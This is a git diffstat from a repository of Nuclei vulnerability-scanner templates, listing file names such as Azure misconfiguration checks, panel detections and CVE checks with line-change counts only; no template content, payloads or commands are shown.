| 5 +- .../Other/atlassian-bamboo-build.yaml | 5 +- .../Other/atlassian-bamboo-panel.yaml | 4 +- .../Other/atlassian-bamboo-setup-wizard.yaml | 5 +- .../Other/atlassian-crowd-panel-581.yaml | 18 + .../Other/atlassian-crowd-panel.yaml | 19 - .../Other/atlassian-login-check.yaml | 5 +- nuclei-templates/Other/atom-sync-remote.yaml | 5 +- .../attitude-theme-open-redirect-586.yaml | 3 +- .../attitude-wp-theme-open-redirect.yaml | 3 - .../Other/audiobookshelf-panel.yaml | 5 +- .../Other/audiocodes-default-login.yaml | 8 +- nuclei-templates/Other/audiocodes-detect.yaml | 10 +- .../Other/aura_utility_services.yaml | 20 + nuclei-templates/Other/auth-js.yaml | 3 - nuclei-templates/Other/auth-json.yaml | 4 +- nuclei-templates/Other/authelia-panel.yaml | 5 +- nuclei-templates/Other/auto-usb-install.yaml | 11 +- .../Other/autobahn-python-detect-593.yaml | 30 - .../Other/autobahn-python-detect-594.yaml | 29 + ...ct-596.yaml => automation-direct-597.yaml} | 0 nuclei-templates/Other/automatisch-panel.yaml | 5 +- nuclei-templates/Other/autoptimize.yaml | 2 +- nuclei-templates/Other/autoset-detect.yaml | 4 +- nuclei-templates/Other/avada-xss.yaml | 6 +- .../avatier-password-management-604.yaml | 20 + .../avatier-password-management-605.yaml | 32 - nuclei-templates/Other/avaya-aura-rce.yaml | 30 +- nuclei-templates/Other/avaya-aura-xss.yaml | 15 +- .../Other/avayaaura-cm-panel.yaml | 11 +- .../Other/avayaaura-system-manager-panel.yaml | 11 +- .../Other/avchat-video-chat-xss.yaml | 17 +- .../Other/aviatrix-panel-608.yaml | 31 + nuclei-templates/Other/aviatrix-panel.yaml | 38 - nuclei-templates/Other/avideo-detect.yaml | 6 +- nuclei-templates/Other/avideo-install.yaml | 14 +- ...er-leakge.yaml => avideo-user-leakge.yaml} | 0 nuclei-templates/Other/avigilon-panel.yaml | 12 +- .../Other/avnil-pdf-generator-check.yaml | 5 +- .../Other/avtech-avn801-camera-panel-611.yaml | 29 - .../Other/avtech-avn801-camera-panel.yaml | 32 + ...n-bypass.yaml => avtech-login-bypass.yaml} | 0 ...ess-id-620.yaml => aws-access-id-618.yaml} | 0 .../Other/aws-access-key-value-622.yaml | 18 + .../Other/aws-access-key-value-625.yaml | 18 - .../Other/aws-access-secret-key.yaml | 9 +- .../Other/aws-bucket-takeover-630.yaml | 8 +- .../Other/aws-cloudfront-service-634.yaml | 22 + .../Other/aws-cloudfront-service.yaml | 22 - nuclei-templates/Other/aws-config.yaml | 19 +- nuclei-templates/Other/aws-credentials.yaml | 15 +- nuclei-templates/Other/aws-ec2-autoscale.yaml | 5 +- .../aws-ecs-container-agent-tasks-640.yaml | 48 +- .../aws-elastic-beanstalk-detect-644.yaml | 31 - .../Other/aws-elastic-beanstalk-detect.yaml | 31 + .../Other/aws-opensearch-login-649.yaml | 6 +- nuclei-templates/Other/aws-redirect-652.yaml | 24 + nuclei-templates/Other/aws-redirect-654.yaml | 24 - nuclei-templates/Other/aws-s3-explorer.yaml | 14 +- .../Other/aws-xray-application.yaml | 5 +- nuclei-templates/Other/awstats-listing.yaml | 7 +- .../Other/awstats-script-658.yaml | 4 +- nuclei-templates/Other/axel-webserver.yaml | 11 +- .../Other/axigen-mail-server-detect.yaml | 12 +- .../Other/axigen-webadmin-660.yaml | 9 +- .../Other/axigen-webmail-662.yaml | 40 + nuclei-templates/Other/axigen-webmail.yaml | 43 - ... axiom-digitalocean-key-exposure-666.yaml} | 0 ...yaxis-669.yaml => axis-happyaxis-670.yaml} | 0 .../Other/axway-api-manager-panel.yaml | 5 +- .../Other/axway-securetransport-panel.yaml | 8 +- .../axway-securetransport-webclient.yaml | 10 +- .../Other/axxon-client-panel.yaml | 9 +- .../Other/azkaban-default-login-671.yaml | 47 + .../Other/azkaban-default-login-673.yaml | 53 - ...lient.yaml => azkaban-web-client-677.yaml} | 0 nuclei-templates/Other/azkaban.yaml | 20 + .../Other/azure-aks-api-unrestricted.yaml | 56 + .../azure-aks-api-version-not-latest.yaml | 56 + .../Other/azure-aks-cni-not-configured.yaml | 56 + .../azure-aks-entra-id-unintegrated.yaml | 55 + ...azure-aks-kubernetes-version-outdated.yaml | 56 + ...azure-aks-managed-identity-unassigned.yaml | 56 + .../azure-aks-network-contrib-unassigned.yaml | 78 + .../Other/azure-aks-not-user-assigned.yaml | 58 + .../Other/azure-aks-rbac-unconfigured.yaml | 56 + .../Other/azure-aks-use-private-kv.yaml | 55 + .../Other/azure-apim-http2-not-enabled.yaml | 56 + .../azure-apim-https-enforcement-missing.yaml | 82 + .../azure-apim-nv-plaintext-exposure.yaml | 73 + .../azure-apim-public-access-disabled.yaml | 56 + ...ure-apim-resource-logs-not-configured.yaml | 56 + .../Other/azure-apim-secretkey.yaml | 5 +- ...system-assigned-identity-unconfigured.yaml | 57 + .../Other/azure-apim-tls-config-weak.yaml | 57 + .../azure-apim-user-assigned-id-not-used.yaml | 57 + .../Other/azure-app-tier-cmk-untagged.yaml | 70 + .../azure-app-tier-vm-disk-unencrypted.yaml | 54 + .../azure-appservice-always-on-disabled.yaml | 53 + .../Other/azure-appservice-auth-disabled.yaml | 54 + .../azure-appservice-backup-not-enabled.yaml | 56 + ...e-appservice-backup-retention-missing.yaml | 56 + ...azure-appservice-client-cert-disabled.yaml | 53 + .../azure-appservice-entra-id-missing.yaml | 55 + ...re-appservice-ftp-deployment-disabled.yaml | 53 + ...zure-appservice-ftps-only-not-enabled.yaml | 53 + .../azure-appservice-http2-not-enabled.yaml | 53 + ...re-appservice-https-only-not-enforced.yaml | 54 + ...azure-appservice-insights-not-enabled.yaml | 58 + ...e-appservice-remote-debugging-enabled.yaml | 53 + ...appservice-tls-latest-version-missing.yaml | 55 + .../azure-blob-anonymous-access-disabled.yaml | 54 + .../azure-blob-immutable-not-enabled.yaml | 62 + .../azure-blob-lifecycle-not-enabled.yaml | 57 + .../azure-blob-service-logging-disabled.yaml | 58 + .../azure-blob-soft-delete-disabled.yaml | 55 + .../Other/azure-budget-alerts-missing.yaml | 33 + .../Other/azure-connection-string.yaml | 6 +- .../azure-cosmosdb-auto-failover-missing.yaml | 53 + ...b-default-network-access-unrestricted.yaml | 59 + .../azure-custom-admin-role-unrestricted.yaml | 57 + .../azure-custom-owner-role-unrestricted.yaml | 54 + .../Other/azure-database-tier-cmk-absent.yaml | 70 + .../azure-db-mysql-delete-unalerted.yaml | 59 + ...e-defender-auto-provisioning-disabled.yaml | 33 + .../azure-delete-lb-alert-unconfigured.yaml | 59 + .../Other/azure-diag-logs-not-enabled.yaml | 53 + ...e-diagnostic-categories-misconfigured.yaml | 33 + ...re-disk-encryption-unattached-volumes.yaml | 53 + .../Other/azure-domain-tenant.yaml | 10 +- ...zure-entra-id-guest-users-unmonitored.yaml | 33 + ...azure-functionapp-access-keys-missing.yaml | 55 + .../azure-functionapp-admin-privileges.yaml | 81 + ...azure-functionapp-appinsights-missing.yaml | 62 + .../azure-functionapp-public-exposure.yaml | 55 + ...e-functionapp-system-assigned-missing.yaml | 56 + ...-functionapp-user-assigned-id-missing.yaml | 56 + ...-functionapp-vnet-integration-missing.yaml | 55 + ...ure-iam-role-resource-lock-unassigned.yaml | 71 + .../azure-key-vault-delete-unalerted.yaml | 59 + .../azure-keyvault-audit-not-enabled.yaml | 53 + ...zure-keyvault-cert-keytype-unapproved.yaml | 70 + ...re-keyvault-cert-transparency-missing.yaml | 70 + ...lt-certificate-insufficient-autorenew.yaml | 76 + .../azure-keyvault-network-unrestricted.yaml | 54 + ...-keyvault-recoverability-unconfigured.yaml | 55 + .../azure-keyvault-resource-lock-check.yaml | 59 + ...zure-keyvault-ssl-autorenewal-missing.yaml | 70 + ...zure-keyvault-trusted-ms-unrestricted.yaml | 53 + .../azure-keyvault-update-unalerted.yaml | 59 + .../Other/azure-lb-create-update-missing.yaml | 59 + nuclei-templates/Other/azure-lb-unused.yaml | 56 + .../azure-log-profile-all-activities.yaml | 56 + ...zure-mfa-not-enabled-privileged-users.yaml | 56 + ...azure-monitor-diagnostic-unrestricted.yaml | 33 + .../azure-mysql-db-update-unalerted.yaml | 59 + .../Other/azure-network-watcher.yaml | 33 + .../Other/azure-nic-ip-forwarding-check.yaml | 55 + .../azure-nsg-create-update-unalerted.yaml | 59 + .../Other/azure-nsg-delete-unalerted.yaml | 59 + .../azure-nsg-rule-delete-unalerted.yaml | 59 + .../azure-nsg-rule-update-unalerted.yaml | 59 + .../Other/azure-openai-cmk-not-enabled.yaml | 58 + ...zure-openai-managed-identity-not-used.yaml | 57 + ...openai-private-endpoints-unconfigured.yaml | 56 + .../azure-openai-public-access-disabled.yaml | 61 + .../Other/azure-pipelines-exposed.yaml | 6 +- ...olicy-assignment-create-alert-missing.yaml | 53 + ...re-policy-assignment-delete-unalerted.yaml | 59 + ...e-policy-not-allowed-types-unassigned.yaml | 57 + ...ostgres-allow-azure-services-disabled.yaml | 58 + ...stgres-connection-throttling-disabled.yaml | 56 + ...e-postgres-double-encryption-disabled.yaml | 56 + ...ure-postgres-log-checkpoints-disabled.yaml | 55 + ...ure-postgres-log-connections-disabled.yaml | 55 + ...-postgres-log-disconnections-disabled.yaml | 55 + .../azure-postgres-log-duration-disabled.yaml | 55 + .../azure-postgresql-db-delete-unalerted.yaml | 59 + .../azure-postgresql-db-update-unalerted.yaml | 59 + .../azure-postgresql-geo-backup-disabled.yaml | 55 + .../azure-postgresql-ssl-enforcement.yaml | 55 + ...-postgresql-storage-autogrow-disabled.yaml | 56 + .../azure-public-ip-delete-unalerted.yaml | 59 + .../azure-public-ip-update-unalerted.yaml | 59 + .../azure-redis-nonssl-port-disabled.yaml | 54 + .../azure-redis-tls-version-outdated.yaml | 62 + ...rch-service-managed-identity-disabled.yaml | 71 + ...zure-security-policy-update-unalerted.yaml | 59 + ...re-security-solution-delete-unalerted.yaml | 59 + ...e-security-solutions-update-unalerted.yaml | 59 + ...ure-servicebus-public-access-disabled.yaml | 57 + ...azure-servicebus-tls-version-outdated.yaml | 61 + .../Other/azure-sql-auditing-disabled.yaml | 56 + .../azure-sql-database-rename-unalerted.yaml | 59 + .../Other/azure-sql-db-update-unalerted.yaml | 58 + .../Other/azure-sql-delete-db-unalerted.yaml | 59 + .../Other/azure-sql-failover-not-enabled.yaml | 55 + .../Other/azure-sql-fw-rule-unalerted.yaml | 59 + .../azure-sql-mi-tde-cmk-not-enabled.yaml | 54 + .../azure-sql-mi-tls-version-outdated.yaml | 60 + .../Other/azure-sql-tde-cmk-not-used.yaml | 55 + .../Other/azure-sql-tde-not-enabled.yaml | 70 + .../azure-sql-va-emails-unconfigured.yaml | 56 + ...zure-storage-account-delete-unalerted.yaml | 59 + ...zure-storage-account-update-unalerted.yaml | 59 + .../azure-storage-blob-public-access.yaml | 54 + .../Other/azure-storage-byok-not-used.yaml | 54 + .../Other/azure-storage-cmk-not-used.yaml | 54 + ...age-cross-tenant-replication-disabled.yaml | 55 + .../azure-storage-encryption-missing.yaml | 54 + .../Other/azure-storage-min-tls-version.yaml | 60 + .../azure-storage-network-unrestricted.yaml | 55 + .../azure-storage-overly-permissive-sap.yaml | 70 + ...storage-private-endpoint-unconfigured.yaml | 55 + .../Other/azure-storage-public-access.yaml | 70 + .../azure-storage-queue-logging-disabled.yaml | 57 + .../Other/azure-storage-secure-transfer.yaml | 55 + .../azure-storage-static-website-review.yaml | 55 + .../azure-storage-table-logging-disabled.yaml | 57 + ...azure-storage-trusted-access-disabled.yaml | 54 + .../azure-synapse-sqlpool-tde-disabled.yaml | 70 + .../Other/azure-takeover-detection-681.yaml | 45 + .../Other/azure-takeover-detection-683.yaml | 40 - ...re-vm-accelerated-networking-disabled.yaml | 70 + ...vm-accelerated-networking-not-enabled.yaml | 54 + ...azure-vm-boot-diagnostics-not-enabled.yaml | 54 + .../Other/azure-vm-boot-disk-unencrypted.yaml | 56 + ...zure-vm-byok-disk-volumes-not-enabled.yaml | 55 + .../azure-vm-create-update-unalerted.yaml | 57 + .../Other/azure-vm-deallocate-unalerted.yaml | 59 + .../Other/azure-vm-delete-unalerted.yaml | 59 + .../azure-vm-endpoint-protection-missing.yaml | 68 + .../Other/azure-vm-entra-id-unenabled.yaml | 57 + .../azure-vm-guest-diagnostics-unenabled.yaml | 55 + .../azure-vm-jit-access-not-enabled.yaml | 55 + .../azure-vm-managed-identity-unassigned.yaml | 55 + ...-vm-performance-diagnostics-unenabled.yaml | 63 + .../Other/azure-vm-poweroff-unalerted.yaml | 59 + .../Other/azure-vm-ssh-auth-type.yaml | 53 + .../Other/azure-vm-standard-ssd-required.yaml | 55 + .../azure-vm-tags-schema-noncompliant.yaml | 60 + .../azure-vm-trusted-launch-disabled.yaml | 55 + .../Other/azure-vm-unapproved-image.yaml | 56 + .../azure-vm-unmanaged-disk-volumes.yaml | 54 + .../azure-vm-web-tier-disk-unencrypted.yaml | 56 + .../azure-vmss-auto-os-upgrade-missing.yaml | 55 + .../azure-vmss-auto-repairs-disabled.yaml | 56 + .../Other/azure-vmss-empty-unattached.yaml | 56 + .../azure-vmss-health-monitoring-missing.yaml | 62 + ...azure-vmss-load-balancer-unassociated.yaml | 56 + .../Other/azure-vmss-public-ip-disabled.yaml | 56 + ...azure-vmss-termination-notif-disabled.yaml | 56 + .../azure-vmss-zone-redundancy-missing.yaml | 62 + .../Other/azure-vnet-ddos-protection.yaml | 55 + nuclei-templates/Other/azure-workflow.yaml | 1 - nuclei-templates/Other/azuredeploy-json.yaml | 4 +- .../Other/babel-config-exposure.yaml | 7 +- nuclei-templates/Other/backdoored-zte.yaml | 19 +- nuclei-templates/Other/backoff-malware.yaml | 6 +- .../Other/backpack-admin-panel.yaml | 9 +- nuclei-templates/Other/backwpup.yaml | 4 +- nuclei-templates/Other/badarg-log.yaml | 5 +- nuclei-templates/Other/bagisto-installer.yaml | 6 +- nuclei-templates/Other/bagisto.yaml | 20 + nuclei-templates/Other/bandook-malware.yaml | 4 +- ...anel-684.yaml => barracuda-panel-686.yaml} | 0 .../Other/{bash.yaml => bash-scanner.yaml} | 0 nuclei-templates/Other/basic-auth-detect.yaml | 23 +- ...ion.yaml => basic-auth-detection-687.yaml} | 0 nuclei-templates/Other/basic-cors-flash.yaml | 2 +- nuclei-templates/Other/basic-cors.yaml | 44 +- .../Other/basic-xss-prober-695.yaml | 31 - .../Other/basic-xss-prober-698.yaml | 31 + nuclei-templates/Other/basicrat-malware.yaml | 8 +- nuclei-templates/Other/bazarr-login-703.yaml | 18 + nuclei-templates/Other/bazarr-login.yaml | 18 - nuclei-templates/Other/beamer-api-token.yaml | 5 +- nuclei-templates/Other/beauty.yaml | 59 + .../Other/beego-admin-dashboard.yaml | 11 +- nuclei-templates/Other/behat-config.yaml | 18 +- nuclei-templates/Other/bems-api-lfi-709.yaml | 20 + nuclei-templates/Other/bems-api-lfi-710.yaml | 24 - .../Other/better-search-replace.yaml | 2 +- .../Other/better-wp-security.yaml | 4 +- ...ml => beward-ipcamera-disclosure-715.yaml} | 0 nuclei-templates/Other/bgp-detect.yaml | 4 +- .../Other/bigant-login-panel.yaml | 7 +- ...-724.yaml => bigbluebutton-login-725.yaml} | 0 .../Other/bigcartel-takeover-728.yaml | 10 +- nuclei-templates/Other/bigfix-login.yaml | 13 +- .../bigip-config-utility-detect-730.yaml | 34 - .../bigip-config-utility-detect-733.yaml | 34 + nuclei-templates/Other/bigip-detect.yaml | 24 +- ...etection-735.yaml => bigip-detection.yaml} | 0 nuclei-templates/Other/bigip-rest-panel.yaml | 18 +- nuclei-templates/Other/bin-binlist.yaml | 15 +- nuclei-templates/Other/binom-installer.yaml | 6 +- ...ect-736.yaml => biometric-detect-737.yaml} | 0 nuclei-templates/Other/biotime-panel.yaml | 10 +- .../Other/bitbucket-client-id.yaml | 6 +- .../Other/bitbucket-client-secret.yaml | 6 +- .../Other/bitbucket-pipelines.yaml | 5 +- .../Other/bitbucket-public-repository.yaml | 6 +- .../Other/bitbucket-takeover-738.yaml | 25 - .../Other/bitbucket-takeover-741.yaml | 22 + .../Other/bitdefender-gravityzone.yaml | 12 +- nuclei-templates/Other/bitrat-c2.yaml | 5 +- .../bitrix-content-spoofing-imagepg.yaml | 4 +- .../Other/bitrix-open-redirect-745.yaml | 40 + .../Other/bitrix-open-redirect.yaml | 40 - nuclei-templates/Other/bitrix-panel-748.yaml | 27 + nuclei-templates/Other/bitrix-panel-750.yaml | 27 - nuclei-templates/Other/bitrix-xss.yaml | 2 +- .../Other/bittrex-access-key.yaml | 6 +- .../Other/bittrex-secret-key.yaml | 6 +- .../Other/bitwarden-vault-panel.yaml | 8 +- nuclei-templates/Other/black-duck-panel.yaml | 11 +- .../Other/black-studio-tinymce-widget.yaml | 2 +- .../Other/blackbox-exporter-metrics.yaml | 7 +- nuclei-templates/Other/blacknix-malware.yaml | 4 +- nuclei-templates/Other/blackworm-malware.yaml | 6 +- nuclei-templates/Other/blazor-boot.yaml | 4 +- nuclei-templates/Other/blesta-installer.yaml | 5 +- .../Other/blind-oast-polyglots.yaml | 41 - .../Other/bloofoxcms-login-panel.yaml | 10 +- .../Other/blue-ocean-excellence-lfi-756.yaml | 25 - .../Other/blue-ocean-excellence-lfi.yaml | 27 + .../Other/bluebanana-malware.yaml | 4 +- .../Other/bmc-discovery-panel.yaml | 9 +- .../Other/bolt-cms-panel-762.yaml | 37 + .../Other/bolt-cms-panel-763.yaml | 38 - .../Other/bookstack-detect-765.yaml | 30 - nuclei-templates/Other/bookstack-detect.yaml | 30 + .../Other/bootstrap-admin-panel-template.yaml | 7 +- nuclei-templates/Other/bottle-debug.yaml | 7 +- nuclei-templates/Other/bozok-malware.yaml | 6 +- .../Other/braintree-access-token-771.yaml | 17 - .../Other/braintree-access-token.yaml | 17 + nuclei-templates/Other/branch-key-774.yaml | 17 + nuclei-templates/Other/branch-key.yaml | 18 - .../Other/brandfolder-lfi-776.yaml | 25 + nuclei-templates/Other/brandfolder-lfi.yaml | 35 - .../Other/brandfolder-open-redirect-780.yaml | 10 +- nuclei-templates/Other/breadcrumb-navxt.yaml | 2 +- .../Other/brightcove-takeover-783.yaml | 19 - .../Other/brightcove-takeover-784.yaml | 15 + .../Other/broken-link-checker.yaml | 2 +- .../Other/brother-printer-detect-788.yaml | 23 - .../Other/brother-printer-detect-789.yaml | 23 + ...l => brother-unauthorized-access-792.yaml} | 0 ...ger.yaml => browserless-debugger-794.yaml} | 0 nuclei-templates/Other/brute-ratel-c4.yaml | 5 +- nuclei-templates/Other/bublik-malware.yaml | 6 +- nuclei-templates/Other/buddy-panel-796.yaml | 38 + nuclei-templates/Other/buddy-panel.yaml | 30 - ...yaml => buffalo-config-injection-798.yaml} | 0 nuclei-templates/Other/build-properties.yaml | 6 +- ...bot-panel-802.yaml => buildbot-panel.yaml} | 0 ...usinessintelligence-default-login-814.yaml | 45 - ...usinessintelligence-default-login-817.yaml | 49 + ...{api-buttercms-403.yaml => buttercms.yaml} | 0 nuclei-templates/Other/bynder-panel.yaml | 4 +- nuclei-templates/Other/caa-fingerprint.yaml | 11 +- .../Other/cab-fare-calculator-lfi-818.yaml | 25 - .../Other/cab-fare-calculator-lfi-819.yaml | 28 + .../Other/cache-poisoning-823.yaml | 33 + .../Other/cache-poisoning-825.yaml | 27 - .../Other/cache-poisoning-xss.yaml | 4 +- nuclei-templates/Other/cached-aem-pages.yaml | 6 +- .../Other/caches-spring-boot.yaml | 2 - nuclei-templates/Other/cacti-panel-828.yaml | 40 + nuclei-templates/Other/cacti-panel-829.yaml | 40 - .../cacti-weathermap-file-write-832.yaml | 23 - .../Other/cacti-weathermap-file-write.yaml | 22 + .../Other/caddy-open-redirect-837.yaml | 16 + .../Other/caddy-open-redirect.yaml | 20 - nuclei-templates/Other/cadvisor-exposure.yaml | 12 +- nuclei-templates/Other/cakephp-config.yaml | 13 +- .../Other/calameo-publications-xss.yaml | 13 +- nuclei-templates/Other/caldera-c2.yaml | 6 +- nuclei-templates/Other/calibre.yaml | 23 + .../Other/call-break-cms-840.yaml | 18 + nuclei-templates/Other/call-break-cms.yaml | 18 - nuclei-templates/Other/camera_firmware.yaml | 22 + .../Other/campaignmonitor-843.yaml | 18 + nuclei-templates/Other/campaignmonitor.yaml | 17 - ...anel-845.yaml => camunda-login-panel.yaml} | 0 .../Other/canal-default-login-846.yaml | 35 - .../Other/canal-default-login.yaml | 30 + .../Other/candidate-application-lfi-850.yaml | 13 +- .../Other/canny-takeover-854.yaml | 20 + .../Other/canny-takeover-857.yaml | 21 - .../Other/cap-hookexkeylogger-malware.yaml | 5 +- .../carel-bacnet-gateway-traversal-858.yaml | 6 +- .../Other/carel-plantvisor-panel.yaml | 57 +- .../Other/cargo-lock-package.yaml | 5 +- ...eover-867.yaml => cargo-takeover-869.yaml} | 0 nuclei-templates/Other/cargo-toml-file.yaml | 5 +- .../Other/cargocollective-takeover-864.yaml | 20 + .../Other/cargocollective-takeover-865.yaml | 21 - nuclei-templates/Other/carrental-xss.yaml | 17 +- nuclei-templates/Other/casaos-panel.yaml | 6 +- nuclei-templates/Other/casdoor-login.yaml | 18 +- .../Other/catalog-creator-detect.yaml | 8 +- .../Other/caton-network-manager-system.yaml | 12 +- nuclei-templates/Other/ccm-detect.yaml | 10 +- nuclei-templates/Other/cdg.yaml | 24 + nuclei-templates/Other/cep-viacep.yaml | 13 +- .../Other/{3833918288.yaml => ceph.yaml} | 0 nuclei-templates/Other/cerber-malware.yaml | 8 +- nuclei-templates/Other/cerberus-malware.yaml | 3 +- nuclei-templates/Other/cercopitheque.yaml | 20 + nuclei-templates/Other/cerebro-panel-878.yaml | 26 + nuclei-templates/Other/cerebro-panel-881.yaml | 22 - ...2.yaml => certificate-validation-883.yaml} | 0 nuclei-templates/Other/cgi-printenv-886.yaml | 29 - nuclei-templates/Other/cgi-printenv.yaml | 25 + nuclei-templates/Other/cgi-test-page-888.yaml | 22 - nuclei-templates/Other/cgi-test-page-890.yaml | 23 + .../Other/chamilo-lms-sqli-892.yaml | 5 +- ...-lms-xss.yaml => chamilo-lms-xss-893.yaml} | 0 .../Other/changedetection-panel.yaml | 5 +- ...et-CRM-sqli.yaml => chanjet-crm-sqli.yaml} | 0 nuclei-templates/Other/chatgpt_web.yaml | 20 + .../Other/checkmarx-panel-897.yaml | 19 + nuclei-templates/Other/checkmarx-panel.yaml | 18 - .../Other/checkout-fields-manager-xss.yaml | 15 +- ...nel-899.yaml => checkpoint-panel-898.yaml} | 0 .../Other/chefio-login-check.yaml | 5 +- .../Other/cherry-file-download-900.yaml | 29 - .../Other/cherry-file-download.yaml | 25 + nuclei-templates/Other/cherry-lfi-902.yaml | 11 +- .../Other/child-theme-configurator.yaml | 2 +- .../Other/chinaunicom-default-login-908.yaml | 12 +- nuclei-templates/Other/chronos-panel.yaml | 7 +- .../Other/church-admin-lfi-914.yaml | 33 - nuclei-templates/Other/church-admin-lfi.yaml | 28 + nuclei-templates/Other/churchope-lfi-915.yaml | 4 - nuclei-templates/Other/cipher-secret-key.yaml | 6 +- .../Other/ciphertrust-default-login.yaml | 8 +- .../Other/circarlife-setup-917.yaml | 28 - .../Other/circarlife-setup-921.yaml | 30 + .../Other/circleci-config-923.yaml | 26 - .../Other/circleci-config-924.yaml | 25 + .../Other/circleci-ssh-config-927.yaml | 27 - .../Other/circleci-ssh-config-928.yaml | 27 + .../{api-circleci.yaml => circleci.yaml} | 0 .../Other/cisco-anyconnect-vpn.yaml | 11 +- .../Other/cisco-asa-panel-935.yaml | 10 +- .../Other/cisco-cloudcenter-suite-rce.yaml | 26 +- .../Other/cisco-expressway-panel.yaml | 4 +- ...ogin-940.yaml => cisco-finesse-login.yaml} | 0 .../Other/cisco-finger-detect.yaml | 12 +- .../Other/cisco-ios-xe-panel.yaml | 9 +- .../Other/cisco-meraki-exposure-944.yaml | 26 + .../Other/cisco-meraki-exposure-946.yaml | 25 - .../Other/cisco-onprem-panel.yaml | 10 +- .../Other/cisco-rv-series-rce.yaml | 4 - nuclei-templates/Other/cisco-sd-wan-957.yaml | 25 + nuclei-templates/Other/cisco-sd-wan.yaml | 26 - ...s-963.yaml => cisco-security-details.yaml} | 0 .../Other/cisco-sendgrid-968.yaml | 30 + .../Other/cisco-sendgrid-969.yaml | 30 - .../Other/cisco-smi-exposure-970.yaml | 35 - .../Other/cisco-smi-exposure-971.yaml | 33 + ...ogin-975.yaml => cisco-systems-login.yaml} | 0 .../cisco-ucs-director-panel-detect.yaml | 2 - .../Other/cisco-ucs-kvm-login-979.yaml | 36 + .../Other/cisco-ucs-kvm-login.yaml | 28 - .../cisco-unified-communications-log4j.yaml | 26 +- .../cisco-unity-express-panel-detect.yaml | 2 - nuclei-templates/Other/cisco-unity-panel.yaml | 6 +- .../Other/cisco-vmanage-log4j.yaml | 38 +- .../Other/cisco-vmanage-login.yaml | 10 +- .../Other/cisco-webvpn-detect.yaml | 10 +- ...aml => citrix-adc-gateway-detect-981.yaml} | 0 .../Other/citrix-hypervisor-page.yaml | 7 +- .../Other/citrix-vpn-detect-984.yaml | 2 +- ...d-xss.yaml => ckan-dom-based-xss-993.yaml} | 0 nuclei-templates/Other/ckan.yaml | 21 + ...uggling.yaml => cl-te-http-smuggling.yaml} | 0 nuclei-templates/Other/clamav-detect.yaml | 60 +- nuclei-templates/Other/clamav-unauth.yaml | 14 +- .../Other/claris-filemaker-webdirect.yaml | 13 +- nuclei-templates/Other/classic-editor.yaml | 2 +- nuclei-templates/Other/classic-widgets.yaml | 2 +- .../Other/clave-login-panel-996.yaml | 4 +- nuclei-templates/Other/cleanweb-panel.yaml | 4 +- nuclei-templates/Other/clearfy-cache-xss.yaml | 14 +- ...aml => clearpass-policy-manager-1001.yaml} | 0 .../Other/click-to-chat-for-whatsapp.yaml | 4 +- .../Other/clickhouse-unauth-1002.yaml | 26 - .../Other/clickhouse-unauth-1003.yaml | 25 + .../clickshare_cs-100_huddle_firmware.yaml | 20 + ...1005.yaml => clientaccesspolicy-1006.yaml} | 0 .../Other/clientmesh-malware.yaml | 5 +- .../Other/clockwatch-enterprise-rce-1009.yaml | 21 +- .../clockwork-dashboard-exposure-1012.yaml | 30 - .../clockwork-dashboard-exposure-1015.yaml | 27 + .../Other/clockwork-php-page-1018.yaml | 22 - .../Other/clockwork-php-page-1019.yaml | 25 + nuclei-templates/Other/clojars-api-token.yaml | 5 +- nuclei-templates/Other/cloud-config.yaml | 6 +- nuclei-templates/Other/cloud-metadata.yaml | 5 +- .../Other/cloud-oa-system-sqli.yaml | 31 +- .../Other/cloud-run-default-page.yaml | 5 +- nuclei-templates/Other/cloud_foundation.yaml | 20 + .../Other/cloudcenter-Installer.yaml | 5 +- ...3.yaml => cloudflare-image-ssrf-1022.yaml} | 0 .../Other/cloudflare-nginx-detect.yaml | 5 +- .../Other/cloudflare-rocketloader-htmli.yaml | 2 +- nuclei-templates/Other/cloudflare.yaml | 6 +- .../Other/cloudfoundry-detect.yaml | 11 +- nuclei-templates/Other/cloudpanel-login.yaml | 12 +- nuclei-templates/Other/cloudstack.yaml | 22 + nuclei-templates/Other/cmb2.yaml | 2 +- .../Other/cmseasy-crossall-act-sqli.yaml | 27 +- ...yaml => cname-service-detection-1032.yaml} | 0 .../Other/cname-service-detector-1033.yaml | 24 - .../Other/cname-service-detector-1034.yaml | 23 + nuclei-templates/Other/cname-service.yaml | 7 - .../Other/cnnvd-200705-315-1035.yaml | 23 - .../Other/cnnvd-200705-315-1036.yaml | 2 - nuclei-templates/Other/cnpj-receitaws.yaml | 12 +- .../Other/cnvd-2018-13393-1037.yaml | 20 +- ...55-1050.yaml => cnvd-2019-06255-1046.yaml} | 0 .../Other/cnvd-2019-19299-1051.yaml | 54 - .../Other/cnvd-2019-32204-1053.yaml | 3 - .../Other/cnvd-2020-23735-1058.yaml | 27 - .../Other/cnvd-2020-46552-1060.yaml | 29 + ...0-56167.yaml => cnvd-2020-56167-1061.yaml} | 0 .../Other/cnvd-2020-62422-1065.yaml | 14 +- .../Other/cnvd-2020-67113-1071.yaml | 37 + .../Other/cnvd-2020-68596-1075.yaml | 36 + .../Other/cnvd-2021-01931-1077.yaml | 26 - .../Other/cnvd-2021-09650-1080.yaml | 20 +- .../Other/cnvd-2021-10543-1084.yaml | 25 - .../Other/cnvd-2021-14536-1087.yaml | 45 + .../Other/cnvd-2021-15822-1095.yaml | 22 + .../Other/cnvd-2021-15824-1097.yaml | 24 - .../Other/cnvd-2021-17369-1098.yaml | 28 + .../Other/cnvd-2021-26422-1103.yaml | 4 - ...1-28277.yaml => cnvd-2021-28277-1105.yaml} | 0 .../Other/cnvd-2021-30167-1110.yaml | 44 + .../Other/cnvd-2021-30167-1112.yaml | 36 - .../Other/cnvd-2021-49104-1115.yaml | 38 - .../Other/cnzxsoft-default-login.yaml | 7 +- .../Other/cobalt-strike-c2-jarm.yaml | 5 +- nuclei-templates/Other/cobalt-strike-c2.yaml | 8 +- .../Other/cobbler-default-login-1121.yaml | 10 +- .../Other/cobbler-exposed-directories.yaml | 2 - .../Other/cobbler-exposed-directory.yaml | 6 +- .../Other/cobbler-version-detect.yaml | 18 +- nuclei-templates/Other/cobbler-version.yaml | 18 +- .../Other/cobbler-webgui-1123.yaml | 2 +- nuclei-templates/Other/coblocks.yaml | 2 +- .../Other/cockpit-detect-1127.yaml | 1 - ...rkflow-1129.yaml => cockpit-workflow.yaml} | 0 .../Other/code-climate-token.yaml | 4 +- nuclei-templates/Other/code-server-login.yaml | 18 +- nuclei-templates/Other/code-snippets.yaml | 2 +- .../Other/code42-log4j-rce-1131.yaml | 43 + nuclei-templates/Other/code42-log4j-rce.yaml | 35 - .../Other/codeception-config.yaml | 8 +- .../Other/codecov-access-token.yaml | 5 +- 